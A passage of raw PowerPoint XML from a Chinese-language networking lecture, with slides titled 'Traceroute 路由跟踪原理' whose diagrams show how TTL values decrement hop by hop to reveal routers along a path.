              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="17961" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="tx1"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="206864" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="1872"/>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30742" name="Group 17"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1059" y="2016"/>
              <a:ext cx="1098" cy="720"/>
              <a:chOff x="1086" y="2016"/>
              <a:chExt cx="1098" cy="720"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="206866" name="Rectangle 18"/>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6867" name="Text Box 19"/>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30745" name="Line 20"/>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9" name="Text Box 21"/>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30747" name="Line 22"/>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8" name="Line 23"/>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2" name="Text Box 24"/>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6873" name="Text Box 25"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="206874" name="Text Box 26"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="206875" name="Text Box 27"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4038600"/>
            <a:ext cx="3771900" cy="1981200"/>
            <a:chOff x="576" y="2544"/>
            <a:chExt cx="2376" cy="1248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30737" name="Rectangle 29"/>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6878" name="Text Box 30"/>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dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>我知道路由器</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>存在于这个路径上</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="206879" name="Text Box 31"/>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dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>路由器</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>IP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 32"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2411413"/>
            <a:ext cx="3238501" cy="2617787"/>
            <a:chOff x="432" y="1519"/>
            <a:chExt cx="2040" cy="1649"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30735" name="AutoShape 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="30737" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="432" y="1519"/>
              <a:ext cx="144" cy="1649"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -100000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000080"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:noFill/>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30736" name="AutoShape 34"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="206873" idx="3"/>
              <a:endCxn id="206879" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2069" y="2298"/>
              <a:ext cx="403" cy="35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08997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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Traceroute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路由跟踪原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31746" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>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97A47416-BD1B-48A9-8B0C-1E9AB44C8E24}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3174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7875" name="Text Box 3"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="31751"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75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753"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7880" name="Text Box 8"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31755" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4038600"/>
            <a:ext cx="3771900" cy="1981200"/>
            <a:chOff x="576" y="2544"/>
            <a:chExt cx="2376" cy="1248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31794" name="Rectangle 10"/>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7883" name="Text Box 11"/>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7884" name="Text Box 12"/>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nvGrpSpPr>
          <p:cNvPr id="3" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1828800"/>
            <a:ext cx="1905000" cy="457200"/>
            <a:chOff x="960" y="1584"/>
            <a:chExt cx="1200" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207886" name="Line 14"/>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1789" name="Group 15"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="1584"/>
              <a:ext cx="1152" cy="192"/>
              <a:chOff x="384" y="1008"/>
              <a:chExt cx="1152" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31790" name="Rectangle 16"/>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1791" name="Line 17"/>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0" name="Text Box 18"/>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TTL=2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="207891" name="Text Box 19"/>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5" name="Group 20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2635250"/>
            <a:ext cx="1066800" cy="839788"/>
            <a:chOff x="2160" y="1660"/>
            <a:chExt cx="672" cy="529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207893" name="Text Box 21"/>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1786" name="Line 22"/>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895" name="Text Box 23"/>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2-1=1&gt;0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 24"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="1828800"/>
            <a:ext cx="1828800" cy="457200"/>
            <a:chOff x="2688" y="1152"/>
            <a:chExt cx="1152" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207897" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688" y="1440"/>
              <a:ext cx="1104"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1780" name="Group 26"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688" y="1152"/>
              <a:ext cx="1152" cy="192"/>
              <a:chOff x="384" y="1008"/>
              <a:chExt cx="1152" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31781" name="Rectangle 27"/>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1782" name="Line 28"/>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01" name="Text Box 29"/>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7902" name="Text Box 30"/>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8" name="Group 31"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1185863" y="2667000"/>
            <a:ext cx="5246687" cy="1587500"/>
            <a:chOff x="747" y="1680"/>
            <a:chExt cx="3305" cy="1000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31767" name="AutoShape 32"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="2345" y="82"/>
              <a:ext cx="110" cy="3305"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -378185"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:noFill/>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31768" name="Group 33"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2928" y="1816"/>
              <a:ext cx="1098" cy="864"/>
              <a:chOff x="1059" y="1536"/>
              <a:chExt cx="1098" cy="864"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="207906" name="Text Box 34"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="1536"/>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31770" name="Group 35"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1059" y="1680"/>
                <a:ext cx="1098" cy="720"/>
                <a:chOff x="1086" y="2016"/>
                <a:chExt cx="1098" cy="720"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="207908" name="Rectangle 36"/>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7909" name="Text Box 37"/>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31773" name="Line 38"/>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11" name="Text Box 39"/>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31775" name="Line 40"/>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6" name="Line 41"/>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14" name="Text Box 42"/>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7915" name="Text Box 43"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207916" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="2616200"/>
            <a:ext cx="1066800" cy="519113"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 45"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2411413"/>
            <a:ext cx="2819400" cy="2389187"/>
            <a:chOff x="432" y="1519"/>
            <a:chExt cx="1776" cy="1505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207918" name="Text Box 46"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="576" y="2851"/>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存在于这个路径上</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31766" name="AutoShape 47"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="207918" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="432" y="1519"/>
              <a:ext cx="144" cy="1419"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -100000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="508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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 48"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3162300" y="4229100"/>
            <a:ext cx="2403475" cy="566738"/>
            <a:chOff x="1992" y="2664"/>
            <a:chExt cx="1514" cy="357"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207921" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1992" y="28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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31764" name="AutoShape 50"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="207915" idx="2"/>
              <a:endCxn id="207921" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="3093" y="2523"/>
              <a:ext cx="271" cy="554"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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95747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7916"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="207916"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20791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12"/>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9585F8F0-6CE5-400A-98B5-C16585C5063F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32774" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Traceroute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路由跟踪原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3277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8899" name="Text Box 3"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="32775"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7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77"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8904" name="Text Box 8"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32779" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4038600"/>
            <a:ext cx="3771900" cy="1981200"/>
            <a:chOff x="576" y="2544"/>
            <a:chExt cx="2376" cy="1248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32821" name="Rectangle 10"/>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07" name="Text Box 11"/>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8908" name="Text Box 12"/>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nvGrpSpPr>
          <p:cNvPr id="3" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1828800"/>
            <a:ext cx="1905000" cy="457200"/>
            <a:chOff x="960" y="1584"/>
            <a:chExt cx="1200" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208910" name="Line 14"/>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816" name="Group 15"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="1584"/>
              <a:ext cx="1152" cy="192"/>
              <a:chOff x="384" y="1008"/>
              <a:chExt cx="1152" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32817" name="Rectangle 16"/>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18" name="Line 17"/>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14" name="Text Box 18"/>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TTL=3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="208915" name="Text Box 19"/>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5" name="Group 20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2635250"/>
            <a:ext cx="1066800" cy="839788"/>
            <a:chOff x="2160" y="1660"/>
            <a:chExt cx="672" cy="529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208917" name="Text Box 21"/>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2813" name="Line 22"/>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919" name="Text Box 23"/>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3-1=2&gt;0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 24"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="1828800"/>
            <a:ext cx="1828800" cy="457200"/>
            <a:chOff x="2688" y="1152"/>
            <a:chExt cx="1152" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208921" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688" y="1440"/>
              <a:ext cx="1104"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807" name="Group 26"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688" y="1152"/>
              <a:ext cx="1152" cy="192"/>
              <a:chOff x="384" y="1008"/>
              <a:chExt cx="1152" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32808" name="Rectangle 27"/>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09" name="Line 28"/>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25" name="Text Box 29"/>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TTL=2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="208926" name="Text Box 30"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="208927" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4525963"/>
            <a:ext cx="2590800" cy="274637"/>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8928" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3162300" y="4521200"/>
            <a:ext cx="1524000" cy="274638"/>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nvGrpSpPr>
          <p:cNvPr id="8" name="Group 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="2628900"/>
            <a:ext cx="1066800" cy="839788"/>
            <a:chOff x="2160" y="1660"/>
            <a:chExt cx="672" cy="529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208930" name="Text Box 34"/>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2804" name="Line 35"/>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932" name="Text Box 36"/>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2-1=1&gt;0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 37"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6537325" y="1828800"/>
            <a:ext cx="1463675" cy="533400"/>
            <a:chOff x="4118" y="1152"/>
            <a:chExt cx="922" cy="336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208934" name="Line 38"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4320" y="1488"/>
              <a:ext cx="672"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798" name="Group 39"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4118" y="1152"/>
              <a:ext cx="922" cy="192"/>
              <a:chOff x="4118" y="1008"/>
              <a:chExt cx="922" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32799" name="Rectangle 40"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4118" y="1008"/>
                <a:ext cx="845"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00" name="Line 41"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4512"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38" name="Text Box 42"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
